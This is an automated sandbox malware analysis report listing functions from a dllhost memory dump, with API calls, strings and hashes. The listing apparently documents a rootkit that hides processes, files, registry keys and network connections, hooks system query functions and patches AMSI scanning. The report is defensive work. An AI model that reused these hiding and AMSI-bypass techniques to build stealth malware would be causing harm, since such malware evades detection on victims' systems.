                                                        • API String ID:
                                                        • Opcode ID: 7f9f47fc1d1d00a15582ce0217e319e1a5c796af2aa1155442032cf22d2cb127
                                                        • Instruction ID: d955d708e997c5b798ef94acacbb184e180d42632487287c219de7a3bd1c7378
                                                        • Opcode Fuzzy Hash: 7f9f47fc1d1d00a15582ce0217e319e1a5c796af2aa1155442032cf22d2cb127
                                                        • Instruction Fuzzy Hash: 2BF062B1755294CAEFA48F28E8437697BE4F318384F808459D7CD83B15D63CC0A08F45
                                                        Function 000002E86A091628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 2135414181-3864762265
                                                        • Opcode ID: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction ID: 3c9f88c4e611def4966ea6c7bc907f8e811a6cd1a12b3cead08829c3b5cd9a3a
                                                        • Opcode Fuzzy Hash: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction Fuzzy Hash: 1F713C36350A90C6EF50AF25E898B9973BCF789B88F002151DE8E53B69DF38C494C352
                                                        Function 000002E86A091D3C Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 80threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 000002E86A091D47
                                                          • Part of subcall function 000002E86A0920C0: GetModuleHandleA.KERNEL32(?,?,?,000002E86A091D79), ref: 000002E86A0920D8
                                                          • Part of subcall function 000002E86A0920C0: GetProcAddress.KERNEL32(?,?,?,000002E86A091D79), ref: 000002E86A0920E9
                                                          • Part of subcall function 000002E86A095F50: GetCurrentThreadId.KERNEL32 ref: 000002E86A095F8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                        • API String ID: 4175298099-4225371247
                                                        • Opcode ID: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction ID: 18358b6203f5e2b1fdb126c81a860b681417304772fb09d220cec99abb3af511
                                                        • Opcode Fuzzy Hash: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction Fuzzy Hash: 864186A4191ACAE1FE00DB54E8597D4232DA758344F9064D396CD231B7AF3886DEC363
                                                        Function 000002E86A0912BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction ID: 9714eba41610e2fcbb448aa014dcdf8643b29c08d50d6a7a6d90ea1e36dd9f7a
                                                        • Opcode Fuzzy Hash: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction Fuzzy Hash: 22512836654B84C6EF54CF62E44C39AB7A9F788BD8F448164DA8A07759DF3CC0898B02
                                                        Function 000002E86A066D30 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000003.2003027264.000002E86A060000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002E86A060000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_3_2e86a060000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: bad array new length
                                                        • API String ID: 190073905-1242854226
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 1cf23eebf528e7e8016fe3c885fc5f0ee74e89b00244606404ef65e80f8ef7d0
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 63810521A802C1C6FF68EB25D85DB5927DCAB59B88F4465D5EACC437A6DF38C8C18703
                                                        Function 000002E86A092FA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Running Time
                                                        • API String ID: 1943346504-1805530042
                                                        • Opcode ID: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction ID: 5694a66559aa247a2245d7d4c821963cda3c95c0d4fb7072ce1d25151a6824a9
                                                        • Opcode Fuzzy Hash: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction Fuzzy Hash: 64319322644AC1D6EF10CF22E80C35AE3A8F7CCB95F444569EF8D53625DF38C4958B42
                                                        Function 000002E86A0930B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Utilization Percentage
                                                        • API String ID: 1943346504-3507739905
                                                        • Opcode ID: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction ID: 9a63027a97c8cb5e03307b7a32ef25ae6586f2a81e0121300653bfaf8829ada0
                                                        • Opcode Fuzzy Hash: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction Fuzzy Hash: A7319C26690B81C6EF50DF22E84C75AE3A9F788F84F045169DE8E53725DF38C4868B02
                                                        Function 0000000140002168 Relevance: 13.6, APIs: 9, Instructions: 103memorycomCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                        • String ID:
                                                        • API String ID: 4184240511-0
                                                        • Opcode ID: 831a2a0f55e8d386c7426dcae08b7aa8164f11a8022bfa627c109503adaa93c3
                                                        • Instruction ID: 86c03c420342539b8bf9be77ba5813866d3cf1bda528b0c751ba45b02f4c66c8
                                                        • Opcode Fuzzy Hash: 831a2a0f55e8d386c7426dcae08b7aa8164f11a8022bfa627c109503adaa93c3
                                                        • Instruction Fuzzy Hash: F04135B6700A859AE711CF6AE8443DD63B1FB88B98F445226FF4A57A69DF38C149C700
                                                        Function 000002E86A092C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 238librarystringloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProclstrlen
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 3607816002-3850299575
                                                        • Opcode ID: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction ID: 1d977dac165b853bfd0220ff567d4071db398c797d484a0947ea38bd9cdf7e34
                                                        • Opcode Fuzzy Hash: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction Fuzzy Hash: 37A1AA32241AD0C2EF688F25D4587A963ADF748B88F1460A6DE8D63B99DF34CCD1C742
                                                        Function 000002E86A09104C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100memoryregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction ID: 7bf26b8adeb3c3f6e9b9082396e2f944c2df80b3c31d3e32d7267be9ab6928d3
                                                        • Opcode Fuzzy Hash: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction Fuzzy Hash: F9416D36254BC0D6EF60CF62E44879AB7A9F388B88F448119DB8917B58DF38C589CB41
                                                        Function 000000014000104C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 100memoryregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: def9ab36c73bc2c092c582bab6e8daf38f60056bdd0c450b3e3dd155ebbb66df
                                                        • Instruction ID: 7fdcaaddb988183a15ff78551661fc8e226b340177abaf4a23510fd888a8b97b
                                                        • Opcode Fuzzy Hash: def9ab36c73bc2c092c582bab6e8daf38f60056bdd0c450b3e3dd155ebbb66df
                                                        • Instruction Fuzzy Hash: 8A414DB2214B8086E765CF62F4447DA77A1F389BD8F448119EB8947B68DF38C589CB40
                                                        Function 000002E86A092344 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                        • String ID: \\.\pipe\Deadchildproc
                                                        • API String ID: 166002920-2259481039
                                                        • Opcode ID: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction ID: 6d563a3eafda5c429282bad5d07c7d2543e9d8c79a4ab07de1c01bcf16b234d1
                                                        • Opcode Fuzzy Hash: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction Fuzzy Hash: 30111C36654B80C3EF108B21F45875AB764F389BD4F544355EB9E06AA8CF7CC189CB02
                                                        Function 000002E86A097930 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 0eed170ab5aa101588b27b9db0a6ebb59a6913746aadc0f097baa1071494e4ba
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: B481E2227842C1C6FF50AB65D84D39962DCAB89B80F146095EACDA7797DF38C9C58703
                                                        Function 000002E86A099930 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,000002E86A099AEF,?,?,?,000002E86A0998B4,?,?,?,?,000002E86A0994A5), ref: 000002E86A0999B5
                                                        • GetLastError.KERNEL32(?,?,?,000002E86A099AEF,?,?,?,000002E86A0998B4,?,?,?,?,000002E86A0994A5), ref: 000002E86A0999C3
                                                        • LoadLibraryExW.KERNEL32(?,?,?,000002E86A099AEF,?,?,?,000002E86A0998B4,?,?,?,?,000002E86A0994A5), ref: 000002E86A0999ED
                                                        • FreeLibrary.KERNEL32(?,?,?,000002E86A099AEF,?,?,?,000002E86A0998B4,?,?,?,?,000002E86A0994A5), ref: 000002E86A099A33
                                                        • GetProcAddress.KERNEL32(?,?,?,000002E86A099AEF,?,?,?,000002E86A0998B4,?,?,?,?,000002E86A0994A5), ref: 000002E86A099A3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction ID: e3e8d481a2e23dc3d2457e9b81cf46c51ebd539b8ba2b08b70b9941ec2792998
                                                        • Opcode Fuzzy Hash: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction Fuzzy Hash: 5531D7313527C0D5EE159B06E808799639CF748BE4F591665DEAD2B3A1DF38C4C5C342
                                                        Function 000002E86A0A1CBC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction ID: 2919d81719b8de0907775bd794dcad07a0b3941d95edc88c3eefc9e6cca3f40d
                                                        • Opcode Fuzzy Hash: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction Fuzzy Hash: 05118F31350BC0C6EF508B52E858719B2A8F788FE4F044265EF9E877A6DF78C8848746
                                                        Function 0000000140001794 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2919379167.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000006.00000002.2918280660.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2920451185.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2921552735.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Delete$CloseEnumOpen
                                                        • String ID: SOFTWARE\Deadconfig
                                                        • API String ID: 3013565938-1882574680
                                                        • Opcode ID: 52927092f250c1abcc012ba980f00c3e647031339fe99cddc7972e625cf8ff0d
                                                        • Instruction ID: 6458ae0190dc3c7e9ac23c9118509b32cf476b90947138c69e15ec66821d85a4
                                                        • Opcode Fuzzy Hash: 52927092f250c1abcc012ba980f00c3e647031339fe99cddc7972e625cf8ff0d
                                                        • Instruction Fuzzy Hash: 6C1186B2614A8486E761CF26F8447D92374F78C7D8F405205E75D4BAA9DF7CC258CB18
                                                        Function 000002E86A095F50 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction ID: f7b68f64ddc665392f0f5abcd19a2058114d3a9c50e5c367d6a32e73f184d2f6
                                                        • Opcode Fuzzy Hash: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction Fuzzy Hash: 2AD1AA36249B88C2DF709B16E49835AB7A4F3C8B88F105256EACD57BA5CF3CC591CB41
                                                        Function 000002E86A0931C0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2944368594.000002E86A0AD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945011084.000002E86A0AF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2945980871.000002E86A0B5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2e86a090000_dllhost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: Dead
                                                        • API String ID: 756756679-1293411866
                                                        • Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction ID: 2aebc73ed3c4985d4cf6312b6bc67b0686e0ae9bdf34e68b0e52e007a87bd6bb
                                                        • Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction Fuzzy Hash: 3231A032741B91C2EE559F56E448369E3A8FB58B80F0450689FDC23B95EF38D4E58B02
                                                        Function 000002E86A091934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.2942646710.000002E86A091000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002E86A090000, based on PE: true
                                                        • Associated: 00000006.00000002.2941902003.000002E86A090000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.2943471437.000002E86A0A3000.00000002.00001000.00020000.00000000.sdmpDownload File
